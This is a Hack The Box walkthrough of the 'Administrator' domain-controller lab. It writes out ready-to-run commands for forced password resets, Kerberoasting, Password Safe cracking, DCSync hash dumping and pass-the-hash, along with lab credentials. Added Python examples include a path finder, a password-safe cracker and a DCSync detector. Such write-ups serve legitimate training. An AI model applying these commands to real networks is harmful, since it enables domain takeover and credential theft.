Details
URL Hack The Box :: Administrator
Difficulty Medium
User Solves U: 7241 ~ R: 7025
Release Date 09 Nov, 2024

Overview

This machine simulates a realistic internal Windows Active Directory environment. The initial access is granted with the following credentials:

  • Username: olivia
  • Password: ichliebedich

Reconnaissance

Rustscan + Nmap

A Rustscan quick sweep followed by Nmap revealed the following open ports:

PORT      STATE SERVICE      VERSION
21/tcp    open  ftp          Microsoft ftpd
53/tcp    open  domain       Simple DNS Plus
88/tcp    open  kerberos-sec Microsoft Windows Kerberos
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
464/tcp   open  kpasswd5?
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (WinRM)
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0
49666/tcp open  msrpc        
49854/tcp open  ncacn_http   Microsoft RPC over HTTP
49859/tcp open  msrpc
49914/tcp open  msrpc
62532/tcp open  msrpc

Key services: FTP (21), Kerberos (88) and WinRM (5985). Kerberos, DNS and RPC over HTTP together mark the host as a domain controller, so the rest of the engagement is about Active Directory rights rather than host-level bugs.


Initial Foothold - Olivia (Standard User)

Tested the provided credentials:

  • FTP: access denied
  • WinRM: success

evil-winrm -i administrator.htb -u olivia -p ichliebedich

Confirmed access as administrator\olivia. Enumeration with whoami /all showed:

  • No local admin rights
  • Key privileges: SeMachineAccountPrivilege

Olivia is a standard domain user with WinRM access.


BloodHound Enumeration

Using BloodHound with bloodhound-python:

bloodhound-python -c All -u olivia -p 'ichliebedich' -d administrator.htb -ns 10.129.126.236

The tool successfully connected to the domain controller (dc.administrator.htb) via LDAP and retrieved the following data:

  • 1 domain
  • 1 domain controller
  • 11 users
  • 53 groups
  • 2 GPOs
  • 1 OU
  • 19 containers

Computer enumeration completed in under 10 seconds, confirming only one system (dc.administrator.htb) in scope.

This dataset was then imported into the GUI for analysis. At this stage, I began exploring possible attack paths such as:

  • Shortest Path to Domain Admins
  • Users with Delegation Rights
  • Users with Local Admin Access
  • Attack paths involving GPO abuse or RBCD

Screenshot: BloodHound, GenericAll edge

Key findings:

  • Only 1 domain controller: dc.administrator.htb
  • Olivia has GenericAll over user michael
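The graph queries above can be reproduced without the GUI. The following is an added example (not the writeup's code and not part of BloodHound): it reads objects in the shape bloodhound-python writes to users.json and domains.json, turns each object's Aces into edges, composes GetChanges plus GetChangesAll into a DCSync edge the way BloodHound does, and breadth-first searches for a path. The objects and SIDs below are constructed to reflect the rights reported on this box; the real JSON carries many more fields.

```python
"""Find an escalation path over abusable ACE edges in bloodhound-python JSON.

Added example, not the page's own code. SAMPLE_OBJECTS mimics the "data" list of
bloodhound-python output (ObjectIdentifier, Properties.name, Aces); SIDs are made up.
"""
from collections import deque

# Constructed sample reflecting the rights BloodHound reported on this box.
SAMPLE_OBJECTS = [
    {"ObjectIdentifier": "S-1-5-21-1-1-1-1108", "Properties": {"name": "OLIVIA@ADMINISTRATOR.HTB"}, "Aces": []},
    {"ObjectIdentifier": "S-1-5-21-1-1-1-1109", "Properties": {"name": "MICHAEL@ADMINISTRATOR.HTB"},
     "Aces": [{"PrincipalSID": "S-1-5-21-1-1-1-1108", "PrincipalType": "User",
               "RightName": "GenericAll", "IsInherited": False}]},
    {"ObjectIdentifier": "S-1-5-21-1-1-1-1110", "Properties": {"name": "BENJAMIN@ADMINISTRATOR.HTB"},
     "Aces": [{"PrincipalSID": "S-1-5-21-1-1-1-1109", "PrincipalType": "User",
               "RightName": "ForceChangePassword", "IsInherited": False}]},
    {"ObjectIdentifier": "S-1-5-21-1-1-1-1112", "Properties": {"name": "EMILY@ADMINISTRATOR.HTB"}, "Aces": []},
    {"ObjectIdentifier": "S-1-5-21-1-1-1-1113", "Properties": {"name": "ETHAN@ADMINISTRATOR.HTB"},
     "Aces": [{"PrincipalSID": "S-1-5-21-1-1-1-1112", "PrincipalType": "User",
               "RightName": "GenericWrite", "IsInherited": False}]},
    # Domain object: the two replication rights that together make up DCSync.
    {"ObjectIdentifier": "S-1-5-21-1-1-1", "Properties": {"name": "ADMINISTRATOR.HTB"},
     "Aces": [{"PrincipalSID": "S-1-5-21-1-1-1-1113", "PrincipalType": "User",
               "RightName": "GetChanges", "IsInherited": False},
              {"PrincipalSID": "S-1-5-21-1-1-1-1113", "PrincipalType": "User",
               "RightName": "GetChangesAll", "IsInherited": False}]},
]

# Rights that give direct control over a user or domain object.
ABUSABLE = {"GenericAll", "GenericWrite", "WriteDacl", "WriteOwner", "ForceChangePassword",
            "AddKeyCredentialLink", "WriteSPN", "AllExtendedRights", "DCSync"}


def build_graph(objects):
    """Return (names, edges); edges[src_sid] is a list of (dst_sid, right)."""
    names = {o["ObjectIdentifier"]: o["Properties"]["name"] for o in objects}
    edges = {}
    for obj in objects:
        dst = obj["ObjectIdentifier"]
        per_principal = {}
        for ace in obj.get("Aces", []):
            per_principal.setdefault(ace["PrincipalSID"], set()).add(ace["RightName"])
        for src, rights in per_principal.items():
            # BloodHound only draws DCSync when both replication rights are present.
            if {"GetChanges", "GetChangesAll"} <= rights:
                rights.add("DCSync")
            for right in sorted(rights & ABUSABLE):
                edges.setdefault(src, []).append((dst, right))
    return names, edges


def find_path(objects, start_name, goal_name):
    """BFS over abusable edges; returns [(src_name, right, dst_name), ...] or None."""
    names, edges = build_graph(objects)
    sid_of = {n: s for s, n in names.items()}
    start, goal = sid_of[start_name.upper()], sid_of[goal_name.upper()]
    prev = {start: None}
    queue = deque([start])
    while queue:
        cur = queue.popleft()
        if cur == goal:
            path = []
            while prev[cur]:
                src, right = prev[cur]
                path.append((names[src], right, names[cur]))
                cur = src
            return path[::-1]
        for dst, right in edges.get(cur, []):
            if dst not in prev:
                prev[dst] = (cur, right)
                queue.append(dst)
    return None


if __name__ == "__main__":
    for hop in find_path(SAMPLE_OBJECTS, "olivia@administrator.htb", "benjamin@administrator.htb"):
        print(" -> ".join(hop))
    print(find_path(SAMPLE_OBJECTS, "ethan@administrator.htb", "administrator.htb"))
    # None: the Benjamin -> Emily hop went through an FTP backup, which is not an AD edge.
    print(find_path(SAMPLE_OBJECTS, "olivia@administrator.htb", "administrator.htb"))
```

The last query returning None is the useful lesson: BloodHound only sees rights that exist in the directory, so a chain like this one, which crosses a file share, has to be stitched together by re-running collection with each new set of credentials, exactly as the writeup does.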

Privilege Escalation to Michael

GenericAll over a user object is full control of that object. Among other things it allows resetting the target's password without knowing the current one, writing an SPN for a targeted Kerberoast, or writing msDS-KeyCredentialLink for a shadow-credentials attack. The quickest route here is a password reset over SMB/MS-RPC (SAMR) with net rpc, authenticating as Olivia:

net rpc password michael BigCh33se1337! -U "administrator.htb/olivia%ichliebedich" -S 10.129.126.236

Note that this overwrites Michael's existing password; on a real engagement that is disruptive and has to be coordinated with the client, whereas the SPN or shadow-credentials options leave the password intact.

Access confirmed via SMB and WinRM:

evil-winrm -i administrator.htb -u michael -p 'BigCh33se1337!'

Screenshot: Evil-WinRM as Michael

To assess privilege level and potential escalation paths, I ran:

whoami /all

The output indicates the user is administrator\michael, with the following SID:

S-1-5-21-1088858960-373806567-254189436-1109

Michael is a member of the following groups:

  • BUILTIN\Users
  • BUILTIN\Remote Management Users
  • NT AUTHORITY\Authenticated Users

Notably, Michael is not part of the Administrators group, and like Olivia, his privileges appear limited.

However, Michael has the following enabled privileges:

  • SeMachineAccountPrivilege – Allows adding computer accounts to the domain (up to ms-DS-MachineAccountQuota, 10 by default); relevant to RBCD-style attacks, not to local escalation.
  • SeChangeNotifyPrivilege – Bypass traverse checking; every user has it.
  • SeIncreaseWorkingSetPrivilege – Minor impact, common among standard users.

At this point, Michael appears to be another low-privileged user with the same local footing as Olivia, but may have different or extended rights within the domain. The next step is to re-enumerate the domain with Michael's credentials to identify any new attack paths.

Screenshot: BloodHound graph, Michael -> Benjamin


Michael → Benjamin

BloodHound shows Michael has ForceChangePassword over benjamin. That edge is the User-Force-Change-Password extended right: it permits a reset rather than a change, so Benjamin's current password is not needed, and the same net rpc technique applies:

net rpc password benjamin BigCh33se1337 -U "administrator.htb/michael%BigCh33se1337!" -S 10.129.126.236

Confirmed access over SMB.

Benjamin's new password was also accepted by the FTP service, which had rejected Olivia earlier. The directory contained a Password Safe (.psafe3) backup file.

Screenshot: FTP directory listing as Benjamin
Screenshot: Password Safe file


Benjamin → Password Safe Dump

Hashcat has a dedicated mode for Password Safe v3 databases (-m 5200). It takes the .psafe3 file itself as the "hash" and brute-forces the master password, because the file header stores a SHA-256 of the key-stretched master password. With the recovered master password the safe opens normally and revealed three stored credentials:

Screenshot: Hashcat, cracked master password

emily: UXLCI5iETUsIBoFVTj8yQFKoHjXmb
alexander: UrkIbagoxMyUGw0aPlj9B0AXSea4Sw
emma: WwANQWnmJnGV07WQN8bMS7FMAbjNur

Screenshot: Password Safe contents
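What mode 5200 actually attacks is only the first 72 bytes of the file. As an added example (not from the writeup), the following Python builds a Password Safe v3 header in memory with a made-up master password and salt, then runs a dictionary attack against it using the format's own key stretching: SHA-256 of password||salt, re-hashed ITER times, with ITER stored in the header (2048 is Password Safe's default). No real .psafe3 file is read; the sample values are constructed.

```python
"""Password Safe v3 master-password check, i.e. what hashcat -m 5200 brute-forces.

Added example, not from the page. Header layout per the Password Safe V3 format:
"PWS3" tag, 32-byte salt, 4-byte little-endian ITER, then SHA-256 of the stretched key.
Only the header is built; the encrypted records that follow it are not needed here.
"""
import hashlib
import hmac
import struct
from typing import Optional

TAG = b"PWS3"
DEFAULT_ITER = 2048  # Password Safe's default iteration count


def stretch_key(password: bytes, salt: bytes, iterations: int) -> bytes:
    """P' = SHA-256(P || SALT), then SHA-256 applied ITER more times."""
    x = hashlib.sha256(password + salt).digest()
    for _ in range(iterations):
        x = hashlib.sha256(x).digest()
    return x


def build_header(master: str, salt: bytes, iterations: int = DEFAULT_ITER) -> bytes:
    """Constructed header only: TAG | SALT | ITER | H(P')."""
    hp = hashlib.sha256(stretch_key(master.encode(), salt, iterations)).digest()
    return TAG + salt + struct.pack("<I", iterations) + hp


def parse_header(blob: bytes):
    if blob[:4] != TAG or len(blob) < 72:
        raise ValueError("not a Password Safe v3 database")
    salt = blob[4:36]
    iterations = struct.unpack("<I", blob[36:40])[0]
    hp = blob[40:72]
    return salt, iterations, hp


def check_master(blob: bytes, candidate: str) -> bool:
    """Recompute H(P') for the candidate and compare with the stored value."""
    salt, iterations, hp = parse_header(blob)
    guess = hashlib.sha256(stretch_key(candidate.encode(), salt, iterations)).digest()
    return hmac.compare_digest(guess, hp)


def crack(blob: bytes, wordlist) -> Optional[str]:
    """Dictionary attack; each guess costs ITER+2 SHA-256 calls, so ITER is the only defence."""
    for word in wordlist:
        if check_master(blob, word):
            return word
    return None


# Constructed sample: fixed salt and a made-up master password (not the box's real one).
SAMPLE_SALT = bytes(range(32))
SAMPLE_MASTER = "correct-horse-battery"
SAMPLE_DB = build_header(SAMPLE_MASTER, SAMPLE_SALT)

if __name__ == "__main__":
    print(parse_header(SAMPLE_DB)[1], "iterations")
    print(crack(SAMPLE_DB, ["password", "letmein", "Backup123", SAMPLE_MASTER]))
```

The takeaway for whoever owns such a backup: 2048 rounds of plain SHA-256 is cheap on a GPU, so a safe left on an anonymous-readable share is only as strong as its master password, and raising the iteration count in Password Safe's options is the one knob that slows this down.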

Only Emily’s credentials worked with WinRM:

evil-winrm -i administrator.htb -u emily -p 'UXLCI5iETUsIBoFVTj8yQFKoHjXmb'

🎯 User Flag

50a726ce7a8a7ae8fa18eec845436658


Emily → Ethan via Kerberoasting

BloodHound showed Emily has GenericWrite over ethan. GenericWrite on a user object includes the right to write servicePrincipalName, so the account can be turned into a Kerberoast target:

A Service Principal Name (SPN) is a unique identifier that links a service instance to a specific service account within a Kerberos environment. In a Kerberoasting attack, any authenticated user can request a service ticket for a known SPN. The resulting ticket is encrypted with a key derived from the service account's password (for RC4-HMAC, the NT hash itself). If that password is weak, it can be cracked offline. I've previously used this technique in Blazorized, that time with WriteSPN rights; in this case, I'll be exploiting GenericWrite instead.

Using the GenericWrite privilege over the user ethan, I'll assign a custom SPN to their account. This allows me to request a service ticket for that SPN, forcing the KDC to return a ticket encrypted under Ethan's key. If the password is weak, I'll be able to crack it offline.

This worked only after some struggle with Kerberos clock skew: the KDC rejects requests whose timestamp is more than five minutes off its own clock (KRB_AP_ERR_SKEW), so the attacking host was synced to the DC first:


sudo ntpdate 10.129.126.236
2025-05-05 04:29:35.667078 (+0000) -0.036966 +/- 0.028348 10.129.126.236 s1 no-leap

python3 targetedKerberoast.py -v -d administrator.htb -u emily -p 'UXLCI5iETUsIBoFVTj8yQFKoHjXmb' --dc-ip 10.129.126.236

[*] Starting kerberoast attacks
[*] Fetching usernames from Active Directory with LDAP
[VERBOSE] SPN added successfully for (ethan)
[+] Printing hash for (ethan)

Hash dumped:

$krb5tgs$23$*ethan$ADMINISTRATOR.HTB...

Cracked with hashcat (mode 13100 is Kerberos 5 TGS-REP with etype 23, RC4-HMAC; an AES ticket would appear as $krb5tgs$17$ or $krb5tgs$18$ and need modes 19600 or 19700 instead):

hashcat -m 13100 ethan.hash rockyou.txt

→ Password: limpbizkit

Screenshot: Ethan's password cracked

Access confirmed via SMB; WinRM was refused for this account.


Ethan → Administrator via DCSync

BloodHound reveals Ethan has DCSync privileges, i.e. both Replicating Directory Changes (DS-Replication-Get-Changes) and Replicating Directory Changes All on the domain object. With those two rights a principal can ask the DC for account secrets over the Directory Replication Service (DRSUAPI) exactly as a peer domain controller would, without touching LSASS or the NTDS.dit file.

Screenshot: Ethan's DCSync permission

Used secretsdump.py to dump domain hashes. As written it pulls every account, krbtgt included; -just-dc-user administrator would limit the replication request to the one account actually needed and is considerably quieter:

secretsdump.py administrator.htb/ethan:limpbizkit@10.129.126.236

Screenshot: hash dump

Dumped the administrator NTLM hash:

Administrator:d56282f276b0<REDACTED>

WinRM access as Administrator:

evil-winrm -i administrator.htb -u administrator -H d56282f276b0...

Screenshot: Administrator shell
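From the defender's side, the DCSync above is visible on the DC. The following is an added example (not from the writeup) of the check a detection engineer would write over Security event 4662: a subject that is not a domain controller requesting the DS-Replication-Get-Changes control-access rights on the domain object. The event lines are constructed in a simplified key=value form rather than real EVTX/XML, the account names mirror the writeup, and the dc_accounts allow-list is an assumption the caller supplies.

```python
"""Flag DCSync-style replication requests in Windows Security event 4662 records.

Added example, not part of the writeup. Real 4662 events need "Audit Directory
Service Access" enabled and a SACL on the domain naming context; the sample lines
below are constructed in a flat key=value form to keep the parsing short.
"""
import re

DS_REPLICATION_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPLICATION_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPLICATION_GET_CHANGES_FILTERED = "89e95b76-444d-4c62-991a-0facbeda640c"
REPLICATION_GUIDS = {DS_REPLICATION_GET_CHANGES, DS_REPLICATION_GET_CHANGES_ALL,
                     DS_REPLICATION_GET_CHANGES_FILTERED}
DOMAIN_DNS_CLASS = "19195a5b-6da0-11d0-afd3-00c04fd930c9"  # schema GUID of domainDNS

# Constructed sample: legitimate DC-to-DC replication, a DCSync by a user, and an unrelated 4662.
SAMPLE_EVENTS = [
    'EventID=4662 SubjectUserName=DC$ SubjectDomainName=ADMINISTRATOR AccessMask=0x100 '
    'ObjectType=%{19195a5b-6da0-11d0-afd3-00c04fd930c9} '
    'Properties="{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"',
    'EventID=4662 SubjectUserName=ethan SubjectDomainName=ADMINISTRATOR AccessMask=0x100 '
    'ObjectType=%{19195a5b-6da0-11d0-afd3-00c04fd930c9} '
    'Properties="{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2} '
    '{89e95b76-444d-4c62-991a-0facbeda640c}"',
    'EventID=4662 SubjectUserName=emily SubjectDomainName=ADMINISTRATOR AccessMask=0x20 '
    'ObjectType=%{bf967aba-0de6-11d0-a285-00aa003049e2} '
    'Properties="{bf967aba-0de6-11d0-a285-00aa003049e2}"',
]


def parse_event(line: str) -> dict:
    """key=value line to dict; quoted values may contain spaces."""
    fields = dict(re.findall(r'(\w+)=("[^"]*"|\S+)', line))
    return {k: v.strip('"') for k, v in fields.items()}


def guids_in(text: str) -> set:
    return {g.lower() for g in re.findall(r"\{([0-9a-fA-F-]{36})\}", text)}


def detect_dcsync(lines, dc_accounts=("DC$",)):
    """Return (subject, requested_guids) for each 4662 where a non-DC principal
    exercised a replication control-access right on the domain object."""
    allow = {dc.upper() for dc in dc_accounts}
    hits = []
    for line in lines:
        ev = parse_event(line)
        if ev.get("EventID") != "4662" or ev.get("AccessMask") != "0x100":  # 0x100 = control access
            continue
        if DOMAIN_DNS_CLASS not in guids_in(ev.get("ObjectType", "")):
            continue
        asked = guids_in(ev.get("Properties", "")) & REPLICATION_GUIDS
        subject = ev.get("SubjectUserName", "")
        if not asked or subject.upper() in allow:
            continue
        hits.append((subject, sorted(asked)))
    return hits


if __name__ == "__main__":
    for subject, guids in detect_dcsync(SAMPLE_EVENTS):
        print(f"possible DCSync by {subject}: {', '.join(guids)}")
```

The allow-list is the weak point of this rule: DC machine accounts replicate legitimately, so they must be excluded, but an attacker who has compromised a DC account (or created a machine account and granted it replication rights) would slip through. Pair it with an alert on changes to the domain object's ACL (event 5136) so that the grant to a user like Ethan is caught before it is used.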


Final Outcome

🏁 Root Flag

d56282f276b0<REDACTED>


Summary of Attack Path

  1. Olivia (WinRM) – standard domain user with the supplied credentials
  2. Olivia → GenericAll → Michael – password reset via net rpc
  3. Michael → ForceChangePassword → Benjamin – password reset via net rpc, then FTP access to the backup
  4. Benjamin → Password Safe – master password cracked with hashcat -m 5200, Emily's credentials extracted
  5. Emily → GenericWrite → Ethan – targeted Kerberoast, TGS hash cracked with hashcat -m 13100
  6. Ethan → DCSync → Administrator – hashes dumped with secretsdump.py, pass-the-hash over WinRM